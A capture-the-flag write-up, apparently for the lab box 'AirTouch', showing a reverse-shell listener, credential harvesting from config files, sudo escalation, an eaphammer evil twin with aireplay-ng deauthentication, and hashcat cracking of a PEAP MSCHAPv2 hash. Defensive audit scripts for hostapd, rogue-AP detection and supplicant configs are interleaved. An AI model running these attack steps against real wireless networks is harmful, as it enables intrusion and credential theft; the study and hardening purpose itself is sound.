root@AirTouch-Consultant:/tmp# chmod +x busybox

root@AirTouch-Consultant:/tmp# ./busybox nc -lnvp 443
listening on [::]:443 ...
connect to [::ffff:192.168.3.46]:443 from [::ffff:192.168.3.1]:57038 ([::ffff:192.168.3.1]:570
SOCKET: Shell has connected! PID: 79709

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

script -c bash 2>/dev/null
Script started, file is typescript

www-data@AirTouch-AP-PSK:/var/www/html/uploads$ pwd
/var/www/html/uploads

From /var/www/html/login.php, we recover hardcoded credentials:

PHP
if (isset($_POST['Submit'])) {
  /* Define username, associated password, and user attribute array */
  $logins = array(
    /*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
    'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
  );

Two plaintext passwords drop out:

  • User user: JunDRDZKHDnpkpDDvay
  • User manager: 2wLFYNh4TSTgA5sNgT4 (for the web app)

And user works for SSH on the tablet manager host:

axura @ labyrinth :~
root@AirTouch-Consultant:/tmp# ssh user@192.168.3.1
user@192.168.3.1's password: 
Permission denied, please try again.
user@192.168.3.1's password: 
Permission denied, please try again.
user@192.168.3.1's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-216-generic x86_64)
[…snip…]
user@AirTouch-AP-PSK:~$ id
uid=1000(user) gid=1000(user) groups=1000(user)
user@AirTouch-AP-PSK:~$ ls -a
.  ..  .bash_history  .bash_logout  .bashrc  .cache  .profile
user@AirTouch-AP-PSK:~$ ip a
[…snip…]
14: wlan7: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether f0:9f:c2:a3:f1:a7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.3.1/24 scope global wlan7
       valid_lft forever preferred_lft forever
    inet6 fe80::f29f:c2ff:fea3:f1a7/64 scope link
       valid_lft forever preferred_lft forever
15: wlan8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 16:ec:ba:dc:96:12 brd ff:ff:ff:ff:ff:ff
    inet 192.168.4.1/24 scope global wlan8
       valid_lft forever preferred_lft forever
    inet6 fe80::14ec:baff:fedc:9612/64 scope link
       valid_lft forever preferred_lft forever
16: wlan9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 4a:14:a7:81:00:6e brd ff:ff:ff:ff:ff:ff
    inet 192.168.5.1/24 scope global wlan9
       valid_lft forever preferred_lft forever
    inet6 fe80::4814:a7ff:fe81:6e/64 scope link
       valid_lft forever preferred_lft forever
17: wlan10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 66:a4:a1:1e:5e:97 brd ff:ff:ff:ff:ff:ff
    inet 192.168.6.1/24 scope global wlan10
       valid_lft forever preferred_lft forever
    inet6 fe80::64a4:a1ff:fe1e:5e97/64 scope link
       valid_lft forever preferred_lft forever
18: wlan11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 26:81:7f:5b:3c:cf brd ff:ff:ff:ff:ff:ff
    inet 192.168.7.1/24 scope global wlan11
       valid_lft forever preferred_lft forever
    inet6 fe80::2481:7fff:fe5b:3ccf/64 scope link
       valid_lft forever preferred_lft forever

Now we're on AirTouch-AP-PSK.

From the interface layout, the AP is acting as a multi-VLAN gateway with multiple wireless segments behind it.

3.2 Sudo

user has full NOPASSWD sudo on AirTouch-AP-PSK, so we can jump straight to root:

axura @ labyrinth :~
user@AirTouch-AP-PSK:~$ sudo -l
Matching Defaults entries for user on AirTouch-AP-PSK:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user may run the following commands on AirTouch-AP-PSK:
    (ALL) NOPASSWD: ALL
user@AirTouch-AP-PSK:~$ sudo su
root@AirTouch-AP-PSK:/home/user# cd
root@AirTouch-AP-PSK:~# ls -la
total 44
drwx------ 1 root root 4096 Jan 18 00:07 .
drwxr-xr-x 1 root root 4096 Jan 18 00:07 ..
lrwxrwxrwx 1 root root    9 Nov 24  2024 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec  5  2019 .bashrc
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
drwxr-xr-x 2 root root 4096 Mar 27  2024 certs-backup
-rwxr-xr-x 1 root root    0 Mar 27  2024 cronAPs.sh
drwxr-xr-x 1 root root 4096 Jan 18 00:08 psk
-rw-r--r-- 1 root root  364 Nov 24  2024 send_certs.sh
-rwxr-xr-x 1 root root 1963 Mar 27  2024 start.sh
-rw-r----- 1 root 1001   33 Jan 18 00:07 user.txt
-rw-r--r-- 1 root root  319 Mar 27  2024 wlan_config_aps
root@AirTouch-AP-PSK:~# cat user.txt
be******************************fe

User flag secured.

4 ROOT

4.1 Configs Enumeration

Under root on AirTouch-AP-PSK, we immediately find the AP's core configuration stash:

axura @ labyrinth :~
root@AirTouch-AP-PSK:~# ls -l
total 24
drwxr-xr-x 2 root root 4096 Mar 27  2024 certs-backup
-rwxr-xr-x 1 root root    0 Mar 27  2024 cronAPs.sh
drwxr-xr-x 1 root root 4096 Jan 18 00:08 psk
-rw-r--r-- 1 root root  364 Nov 24  2024 send_certs.sh
-rwxr-xr-x 1 root root 1963 Mar 27  2024 start.sh
-rw-r----- 1 root 1001   33 Jan 18 00:07 user.txt
-rw-r--r-- 1 root root  319 Mar 27  2024 wlan_config_aps

root@AirTouch-AP-PSK:~# ls psk
hostapd_other0.conf  hostapd_other2.conf  hostapd_wpa.conf
hostapd_other1.conf  hostapd_other3.conf

root@AirTouch-AP-PSK:~# ls certs-backup/
ca.conf  ca.crt  server.conf  server.crt  server.csr  server.ext  server.key

root@AirTouch-AP-PSK:~# cat wlan_config_aps

# SET WLAN AND IP FOR EVERYTHING

WLAN_PSK=wlan7
IP_PSK='192.168.3'
MAC_PSK='F0:9F:C2:A3:F1:A7'

WLAN_OTHER0=wlan8
IP_OTHER0='192.168.4'
MAC_OTHER0=''

WLAN_OTHER1=wlan9
IP_OTHER1='192.168.5'
MAC_OTHER1=''

WLAN_OTHER2=wlan10
IP_OTHER2='192.168.6'
MAC_OTHER2=''

WLAN_OTHER3=wlan11
IP_OTHER3='192.168.7'
MAC_OTHER3=''

root@AirTouch-AP-PSK:~# cat psk/hostapd_wpa.conf
interface=wlan7
driver=nl80211

hw_mode=g
channel=6
ssid=AirTouch-Internet

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=challenge

ap_isolate=1

Found:

  • certs-backup/ (CA + server cert + private key)
  • psk/hostapd_*.conf (WiFi configs for all SSIDs/VLANs)
  • wlan_config_aps (WLAN ↔ subnet mapping)

WLAN Mapping

wlan_config_aps shows how each WLAN interface maps to a VLAN-style subnet:

  • wlan7 → 192.168.3.0/24 (PSK VLAN)
  • wlan8 → 192.168.4.0/24
  • wlan9 → 192.168.5.0/24
  • wlan10 → 192.168.6.0/24
  • wlan11 → 192.168.7.0/24

AirTouch-Internet (PSK) Confirmation

psk/hostapd_wpa.conf is the config for AirTouch-Internet, and it confirms everything we exploited:

  • WPA2-PSK on wlan7
  • channel 6
  • password = challenge
  • ap_isolate=1 (clients can't talk to each other)

That last line is why sniffing "tablet traffic" felt dead — even if multiple clients exist, they're isolated at L2.
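As an added example (not code from the write-up or the box), an audit for hostapd.conf files like the ones under /root/psk. It flags each setting that let the AirTouch-Internet chain work (offline-crackable short PSK, TKIP offered, no 802.11w) and shows a hardened configuration beside the weak one. The function names are mine; both configs are constructed here, the weak one mirroring the psk/hostapd_wpa.conf values above, and the hardened passphrase is a placeholder.

```python
"""Added example, not code from the write-up: an audit for hostapd.conf files
like those under /root/psk on AirTouch-AP-PSK.  It flags each setting that let
the AirTouch-Internet chain work (offline-crackable PSK, TKIP, no 802.11w) and
shows a hardened configuration beside the weak one.  Both configs are
constructed here; the weak one mirrors the psk/hostapd_wpa.conf values above."""
import re

WEAK_CONF = """\
interface=wlan7
driver=nl80211
hw_mode=g
channel=6
ssid=AirTouch-Internet
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase=challenge
ap_isolate=1
"""

# Same SSID and channel, but WPA3-SAE only, CCMP only, PMF required, and a
# long passphrase.  The passphrase is a placeholder to replace with a random one.
HARDENED_CONF = """\
interface=wlan7
driver=nl80211
hw_mode=g
channel=6
ssid=AirTouch-Internet
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=CHANGE-ME-to-a-long-random-passphrase
ieee80211w=2
ap_isolate=1
"""


def parse_hostapd(text: str) -> dict:
    """key=value per line, '#' comments; values are kept literally (hostapd
    does not strip quotes, so a quoted passphrase includes the quote marks)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf


def passphrase_findings(pw: str) -> list:
    out = []
    if len(pw) < 16:
        out.append(f"passphrase is only {len(pw)} characters; one captured 4-way "
                   "handshake lets it be guessed offline at tens of thousands of tries/s")
    classes = sum(bool(re.search(p, pw)) for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < 3:
        out.append(f"passphrase uses only {classes} character class(es)")
    return out


def audit_hostapd(text: str) -> list:
    """Return the list of findings; an empty list means no weak setting was found."""
    c = parse_hostapd(text)
    findings = []
    if c.get("wpa") in ("1", "3"):
        findings.append(f"wpa={c['wpa']} enables WPA1 (TKIP, RC4)")
    ciphers = (c.get("wpa_pairwise", "") + " " + c.get("rsn_pairwise", "")).split()
    if "TKIP" in ciphers:
        findings.append("TKIP offered as a pairwise cipher; restrict to CCMP")
    key_mgmt = c.get("wpa_key_mgmt", "").split()
    if "WPA-PSK" in key_mgmt and "SAE" not in key_mgmt:
        findings.append("WPA-PSK only: the PSK handshake is offline-crackable; move to SAE (WPA3)")
    pw = c.get("wpa_passphrase") or c.get("sae_password")
    if pw is not None:
        findings.extend(passphrase_findings(pw))
    if c.get("ieee80211w", "0") == "0":
        findings.append("ieee80211w not set: deauth/disassoc frames are unauthenticated, "
                        "so any nearby radio can force clients to reconnect and re-handshake")
    if c.get("ap_isolate") != "1":
        findings.append("ap_isolate=0: clients on this SSID can reach each other at layer 2")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        findings = audit_hostapd(text)
        print(f"== {name}: {len(findings)} finding(s)")
        for f in findings:
            print("  -", f)
```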

Other SSIDs

Enumerating hostapd_other*.conf shows the remaining WLANs are just "neighbor WiFi" PSKs, each with its own hardcoded passphrase.

axura @ labyrinth :~
root@AirTouch-AP-PSK:~# for f in psk/hostapd_other*.conf; do
>   echo "===================="
>   echo "$f"
>   echo "===================="
>   cat "$f"
>   echo
> done
====================
psk/hostapd_other0.conf
====================
interface=wlan8
driver=nl80211

hw_mode=g
channel=3
ssid=MOVISTAR_FG68

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase="bvZmh2dQ5ZC5Fe79YLzViAijK"

====================
psk/hostapd_other1.conf
====================
interface=wlan9
driver=nl80211

hw_mode=g
channel=6
ssid=WIFI-JOHN

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP
wpa_passphrase="XX3e7CugmAwtc5HV5KqnkYx27"

====================
psk/hostapd_other2.conf
====================
interface=wlan10
driver=nl80211

hw_mode=g
channel=1
ssid=vodafoneFB6N

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase="obwk4PxNRY7HZcStaP4LELhpF"

====================
psk/hostapd_other3.conf
====================
interface=wlan11
driver=nl80211

hw_mode=g
channel=9
ssid=MiFibra-24-D4VY

wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_passphrase="TYYHbhajPnHxcHuCt2d3xRyMK"

Office VLAN Credentials

The real pivot is hidden in send_certs.sh:

Bash
#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

So we now have a clean target and credentials:

  • Host: 10.10.10.1 (Office VLAN gateway)
  • SSH: remote / xGgWEwqUpfoOVsLeROeG

Next step: jump into the AirTouch-Office network.

4.2 EAPHammer

4.2.1 EAPHammer 101

Back on AirTouch-Consultant, we already had a gift waiting in /root:

axura @ labyrinth :~
root@AirTouch-Consultant:~# ls -a
.   .bash_history  .cache  .profile  .wget-hsts  linpeas.sh
..  .bashrc        .gnupg  .ssh      eaphammer

root@AirTouch-Consultant:~# ls eaphammer/
Changelog          core                   logs                       run
ESSIDStripping.md  db                     loot                       saved-configs
LICENSE            docs                   parrot-dependencies.txt    scripts
README.md          eaphammer              parrot-setup               settings
SECURITY.md        ehdb                   payload_generator          templates
__version__.py     forge-beacons          payloads                   testing
base               kali-dependencies.txt  pip.req                    tmp
cert_wizard        kali-setup             raspbian-dependencies.txt  ubuntu-unattended-setup
certs              local                  raspbian-setup             wordlists

EAPHammer is an evil-twin framework for WPA-Enterprise (802.1X) networks. The idea is simple:

We impersonate the corporate WiFi, bait a client into authenticating, then steal creds (or hashes).

4.2.2 EAPHammer Workflow

4.2.2.1 Build an Evil Twin AP

Clone SSID: AirTouch-Office

4.2.2.2 Host a Fake RADIUS/EAP Server

When a corporate client tries to connect, the rogue AP says:

"Hi, authenticate."

4.2.2.3 Capture the Creds

Depending on the EAP method, we might get:

  • plaintext creds (rare)
  • MSCHAPv2 challenge/response (common)

MSCHAPv2 can be cracked offline to recover the real password, letting us:

  • join the real AirTouch-Office
  • pivot into the corp VLAN 10.10.10.0/24

4.2.3 Corporate WiFi

Corporate WiFi usually means:

  • WPA2-Enterprise
  • 802.1X authentication
  • EAP methods (PEAP/TTLS/TLS)
  • backed by RADIUS

So instead of PSKs, clients authenticate with:

  • username/password (most common)
  • certificates (more painful)

To confirm what AirTouch-Office is running:

axura @ labyrinth :~
root@AirTouch-Consultant:~# iw dev wlan3 scan | sed -n '/SSID: AirTouch-Office/,+25p'
        SSID: AirTouch-Office
        Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
        DS Parameter set: channel 44
        Country: ES     Environment: Indoor/Outdoor
                Channels [36 - 48] @ 23 dBm
                Channels [149 - 169] @ 13 dBm
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: IEEE 802.1X
                 * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
        Extended capabilities:
                 * Extended Channel Switching
                 * Multiple BSSID
                 * SSID List
                 * Operating Mode Notification
        WMM:     * Parameter version 1
                 * BE: CW 15-1023, AIFSN 3
                 * BK: CW 127-32767, AIFSN 7
                 * VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
                 * VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec
BSS ac:8b:a9:f3:a1:13(on wlan3)
        last seen: 14602.456s [boottime]
        TSF: 1768736686013647 usec (20471d, 11:44:46)
        freq: 5220
        beacon interval: 100 TUs
        SSID: AirTouch-Office
        Supported rates: 6.0* 9.0 12.0* 18.0 24.0* 36.0 48.0 54.0
        DS Parameter set: channel 44
        Country: ES     Environment: Indoor/Outdoor
                Channels [36 - 48] @ 23 dBm
                Channels [149 - 169] @ 13 dBm
        RSN:     * Version: 1
                 * Group cipher: CCMP
                 * Pairwise ciphers: CCMP
                 * Authentication suites: IEEE 802.1X
                 * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
        Extended capabilities:
                 * Extended Channel Switching
                 * Multiple BSSID
                 * SSID List
                 * Operating Mode Notification
        WMM:     * Parameter version 1
                 * BE: CW 15-1023, AIFSN 3
                 * BK: CW 127-32767, AIFSN 7
                 * VI: CW 32767-32767, AIFSN 3, TXOP 3008 usec
                 * VO: CW 32767-32767, AIFSN 7, TXOP 1504 usec

AirTouch-Office = WPA2-Enterprise (IEEE 802.1X), so there is NO PSK to crack.

4.2.4 PMKID

Now we just need a station attempting to connect.

Monitor channel 44:

Bash
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

airodump-ng -c 44 wlan0

We see two APs under the same SSID, plus several clients:

axura @ labyrinth :~

 CH 44 ][ Elapsed: 54 s ][ 2026-01-18 12:03 ][ WPA handshake: AC:8B:A9:AA:3F:D2 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 AC:8B:A9:F3:A1:13  -28 100      561        0    0  44   54e  WPA2 CCMP   MGT  AirTouch-Offic
 AC:8B:A9:AA:3F:D2  -28 100      561       52    0  44   54e  WPA2 CCMP   MGT  AirTouch-Offic
 66:A4:A1:1E:5E:97  -28 100      562        0    0   1   54        TKIP   PSK  vodafoneFB6N  

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 AC:8B:A9:AA:3F:D2  28:6C:07:12:EE:A1  -29    6e- 6e     0       33  PMKID  AirTouch-Office
 AC:8B:A9:AA:3F:D2  28:6C:07:12:EE:F3  -29    6e- 6e     0       40  PMKID  AirTouch-Office
 AC:8B:A9:AA:3F:D2  C8:8A:9A:6F:F9:D2  -29    0 -48e     0        8         AirTouch-Office

APs (same SSID)

  • AC:8B:A9:F3:A1:13 (MGT / WPA2-Enterprise)
  • AC:8B:A9:AA:3F:D2 (MGT / WPA2-Enterprise)

Clients Seen on AirTouch-Office

  • 28:6C:07:12:EE:A1 → PMKID
  • 28:6C:07:12:EE:F3 → PMKID
  • C8:8A:9A:6F:F9:D2 → normal traffic

A PMKID capture is useful for PSK networks, but here the real win is: we have active clients to lure.

4.2.5 EAPHammer Exploit

Phase 1 — Lock BSSID / Channel

On the consultant host as root (sniffer interface in monitor mode):

Bash
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

airodump-ng --band a wlan0

Pick one AP (seen in 4.2.4) and lock onto it:

Bash
airodump-ng -c 44 --bssid AC:8B:A9:AA:3F:D2 -w /tmp/office wlan0

Leave it running.

Phase 2 — Evil Twin Harvest Creds

On AirTouch-AP-PSK (192.168.3.1) we already recovered valid cert material: /root/certs-backup/{ca.crt,server.crt,server.key}.

Copy them to the consultant host:

Bash
# on AP host
# use password: RxBlZhLmOkacNWScmZ6D
scp /root/certs-backup/ca.crt [email protected]:/tmp/ca.crt
scp /root/certs-backup/server.crt [email protected]:/tmp/server.crt
scp /root/certs-backup/server.key [email protected]:/tmp/server.key

Import into eaphammer:

Bash
# on consultant host as root
cd /root/eaphammer
./eaphammer --cert-wizard import \
            --server-cert /tmp/server.crt \
            --private-key /tmp/server.key \
            --ca-cert /tmp/ca.crt

Activate eaphammer:

axura @ labyrinth :~
                     .__
  ____ _____  ______ |  |__ _____    _____   _____   ___________
_/ __ \\__  \ \____ \|  |  \\__  \  /     \ /     \_/ __ \_  __ \
\  ___/ / __ \|  |_> >   Y  \/ __ \|  Y Y  \  Y Y  \  ___/|  | \/
 \___  >____  /   __/|___|  (____  /__|_|  /__|_|  /\___  >__|
     \/     \/|__|        \/     \/      \/      \/     \/


                        Now with more fast travel than a next-gen Bethesda game. >:D

                             Version:  1.14.0
                            Codename:  Final Frontier
                              Author:  @s0lst1c3
                             Contact:  gabriel<<at>>transmitengage.com


[?] Am I root?
[*] Checking for rootness...
[*] I AM ROOOOOOOOOOOOT
[*] Root privs confirmed! 8D
Case 1: Import all separate
[CW] Ensuring server cert, CA cert, and private key are valid...
/tmp/server.crt
/tmp/server.key
/tmp/ca.crt
[CW] Complete!
[CW] Loading private key from /tmp/server.key
[CW] Complete!
[CW] Loading server cert from /tmp/server.crt
[CW] Complete!
[CW] Loading CA certificate chain from /tmp/ca.crt
[CW] Complete!
[CW] Constructing full certificate chain with integrated key...
[CW] Complete!
[CW] Writing private key and full certificate chain to file...
[CW] Complete!
[CW] Private key and full certificate chain written to: /root/eaphammer/certs/server/AirTouch
CA.pem
[CW] Activating full certificate chain...
[CW] Complete!

This is the real weapon: a legit-looking cert chain means clients won't immediately panic.

Phase 3 — Start the Evil Twin

Bring up the rogue AirTouch-Office:

Bash
./eaphammer \
  --interface wlan4 \
  --channel 44 \
  --essid "AirTouch-Office" \
  --auth wpa-eap \
  --creds \
  --karma

Now wlan4 is broadcasting a fake AirTouch-Office on channel 44, waiting for a victim to authenticate:

axura @ labyrinth :~
[ … snip … ]
[*] Success: wlan4 no longer controlled by NetworkManager.
[!] The hw_mode specified in hostapd.ini is invalid for the selected channel (g, 44)
[!] Falling back to hw_mode: a
[*] WPA handshakes will be saved to /root/eaphammer/loot/wpa_handshake_capture-2026-01-19-00-28-35-mc0IZDwJtjdQ4xJvVntdu45hDyBtwS9C.hccapx

[hostapd] AP starting...

Configuration file: /root/eaphammer/tmp/hostapd-2026-01-19-00-28-35-2V64be14H1Q3KjSwNhb8b0TPLMsEniFG.conf
rfkill: Cannot open RFKILL control device
wlan4: interface state UNINITIALIZED->COUNTRY_UPDATE
Using interface wlan4 with hwaddr 00:11:22:33:44:00 and ssid "AirTouch-Office"
wlan4: interface state COUNTRY_UPDATE->ENABLED
wlan4: AP-ENABLED

Press enter to quit...
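From the defender's side, the on-air fingerprint of this setup is a BSSID nobody provisioned beaconing the corporate SSID (here hostapd even reports its hwaddr, 00:11:22:33:44:00). The following is an added example, not code from the page or from eaphammer: it parses `iw dev scan` output in the 4.2.3 format and flags AirTouch-Office BSSs that fall outside a constructed allowlist of the two real APs or that do not advertise 802.1X; the sample scan is constructed.

```python
import re

# Allowlist of the legitimate AirTouch-Office BSSIDs from the 4.2.3 scan (constructed)
KNOWN_OFFICE_BSSIDS = {"ac:8b:a9:f3:a1:13", "ac:8b:a9:aa:3f:d2"}

# Constructed sample in `iw dev <if> scan` format: the two real APs plus a third BSS
# using the hwaddr hostapd reported for the rogue wlan4 AP (00:11:22:33:44:00).
SAMPLE_SCAN = """
BSS ac:8b:a9:f3:a1:13(on wlan3)
\tfreq: 5220
\tSSID: AirTouch-Office
\tRSN:\t * Version: 1
\t\t * Authentication suites: IEEE 802.1X
BSS ac:8b:a9:aa:3f:d2(on wlan3)
\tfreq: 5220
\tSSID: AirTouch-Office
\tRSN:\t * Version: 1
\t\t * Authentication suites: IEEE 802.1X
BSS 00:11:22:33:44:00(on wlan3)
\tfreq: 5220
\tSSID: AirTouch-Office
\tRSN:\t * Version: 1
\t\t * Authentication suites: IEEE 802.1X
"""


def parse_iw_scan(text):
    """Split `iw dev scan` output into one record per BSS block."""
    records, cur = [], None
    for line in text.splitlines():
        m = re.match(r"BSS ([0-9a-f:]{17})", line)
        if m:
            cur = {"bssid": m.group(1).lower(), "ssid": None, "freq": None, "auth": ""}
            records.append(cur)
            continue
        s = line.strip()  # attribute lines are tab-indented under their BSS header
        if s.startswith("SSID: "):
            cur["ssid"] = s[len("SSID: "):]
        elif s.startswith("freq: "):
            cur["freq"] = int(s[len("freq: "):])
        elif s.startswith("* Authentication suites: "):
            cur["auth"] = s[len("* Authentication suites: "):]
    return records


def find_rogue_aps(text, essid, known_bssids):
    """BSSs beaconing `essid` from a BSSID outside the allowlist, or without 802.1X.

    Either is the on-air shape of an evil twin: a foreign BSSID, or the corporate
    SSID downgraded to PSK/open so that no EAP server is needed at all."""
    rogues = []
    for r in parse_iw_scan(text):
        if r["ssid"] == essid and (r["bssid"] not in known_bssids or "802.1X" not in r["auth"]):
            rogues.append((r["bssid"], r["freq"], r["auth"]))
    return rogues
```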

Phase 4 - Deauth the Real Clients

To force clients off the real AP and into our twin:

Bash
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# hard-lock wlan0 channel before injection
iw dev wlan0 set channel 44

Deauth (try broadcast first, then targeted if needed):

Bash
# 1) Don't aim at a station yet. First do broadcast deauth
aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 wlan0
aireplay-ng -0 10 -a AC:8B:A9:F3:A1:13 wlan0

# 2) If stations appear/reconnect, then do targeted deauth
aireplay-ng -0 10 -a AC:8B:A9:AA:3F:D2 -c 28:6C:07:12:EE:F3 wlan0

And the moment a client bites, eaphammer spills the loot:

axura @ labyrinth :~
[ … snip … ]
         challenge:                     f4:de:34:71:68:c9:8b:ac
         response:                      28:ac:0d:f7:79:7e:70:ac:8e:db:d0:db:4a:74:4a:89:c9:33:af:19:df:99:57:32

         jtr NETNTLM:                   r4ulcl:$NETNTLM$f4de347168c98bac$28ac0df7797e70ac8edbd0db4a744a89c933af19df995732

         hashcat NETNTLM:               r4ulcl::::28ac0df7797e70ac8edbd0db4a744a89c933af19df995732:f4de347168c98bac


wlan4: CTRL-EVENT-EAP-FAILURE 28:6c:07:12:ee:f3
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.11: deauthenticated due to local deauth request
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.11: authenticated
wlan4: STA 28:6c:07:12:ee:f3 IEEE 802.11: associated (aid 1)
wlan4: CTRL-EVENT-EAP-STARTED 28:6c:07:12:ee:f3
wlan4: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan4: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

Harvested MSCHAPv2 (PEAP) creds → which gives us a NETNTLM hash to crack offline.

4.3 NETNTLM

Eaphammer gave us an MSCHAPv2 challenge/response from PEAP. The hashcat mode for this is 5500:

Bash
cat > mschapv2.hash << 'EOF'
r4ulcl::::d3b5c9b9247d754d6a5dcc0757b219e7b799f588cf11b3f2:8ef004bc2ccbcca4
EOF

hashcat -m 5500 -a 0 mschapv2.hash /usr/share/wordlists/rockyou.txt --force

Result:

Hashcat
r4ulcl::::d3b5c9b9247d754d6a5dcc0757b219e7b799f588cf11b3f2:8ef004bc2ccbcca4:laboratory

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5500 (NetNTLMv1 / NetNTLMv1+ESS)
Hash.Target......: r4ulcl::::d3b5c9b9247d754d6a5dcc0757b219e7b799f588c...cbcca4

Credential recovered: r4ulcl / laboratory

4.4 Office VLAN

Now we use the valid PEAP creds to authenticate into the Enterprise SSID AirTouch-Office, which drops us into the office VLAN.

Bash
# 1) bring up any unused wlan interface on the client (consultant), e.g. wlan6
ip link set wlan6 up
# verify
iw dev wlan6 info

# 2) create PEAP config with identity including domain
cat > /tmp/office.conf <<'EOF'
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
}
EOF


# 3) connect
wpa_supplicant -B -D nl80211 -i wlan6 -c /tmp/office.conf

# 4) get DHCP lease
dhclient -v wlan6

# 5) verify
ip -br a | grep wlan6
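The network block in step 2 works against the real AP, but it is also exactly why the evil twin in 4.2.5 succeeded: with no `ca_cert` and no `domain_match`, the supplicant runs MSCHAPv2 against whatever certificate it is shown. As an added example (not from the page), a small checker over wpa_supplicant network blocks, with the weak block beside a hardened one; the CA path and RADIUS server name in the hardened block are placeholders.

```python
import re

# The network block from step 2 above, as the page gives it: no CA, no server-name check
WEAK_CONF = r'''
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
}
'''

# Hardened form (constructed; CA path and RADIUS server name are placeholders): the supplicant
# now rejects a server whose cert is not from the corporate CA or lacks the expected name.
HARDENED_CONF = r'''
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    ca_cert="/etc/ssl/certs/airtouch-corp-ca.pem"
    domain_match="radius.airtouch.example"
    phase2="auth=MSCHAPV2"
}
'''

# Any one of these ties the server certificate to a name, not just to a CA
SERVER_NAME_KEYS = {"domain_match", "domain_suffix_match", "subject_match", "altsubject_match"}


def parse_network_block(text):
    """Return the key=value options of the first network={...} block, quotes stripped."""
    body = re.search(r"network=\{(.*?)\}", text, re.S).group(1)
    opts = {}
    for line in body.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            opts[key.strip()] = value.strip().strip('"')
    return opts


def audit_eap_network(text):
    """List the settings missing from a WPA-EAP block that an evil twin relies on."""
    opts = parse_network_block(text)
    findings = []
    if opts.get("key_mgmt") != "WPA-EAP":
        return findings  # PSK/open network: not an 802.1X client, nothing to check
    if "ca_cert" not in opts:
        findings.append("ca_cert missing: any server certificate is accepted")
    if SERVER_NAME_KEYS.isdisjoint(opts):
        findings.append("no server-name match: any cert from that CA is accepted")
    if opts.get("eap") in ("PEAP", "TTLS") and "phase2" not in opts:
        findings.append("phase2 unset: inner method not pinned to MSCHAPV2")
    return findings
```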

We now have access to the AirTouch-Office WiFi with IP 10.10.10.38. Next, SSH to 10.10.10.1 with the creds found in send_certs.sh on the AP host (remote / xGgWEwqUpfoOVsLeROeG):

axura @ labyrinth :~
root@AirTouch-Consultant:~# ip -br a | grep wlan6
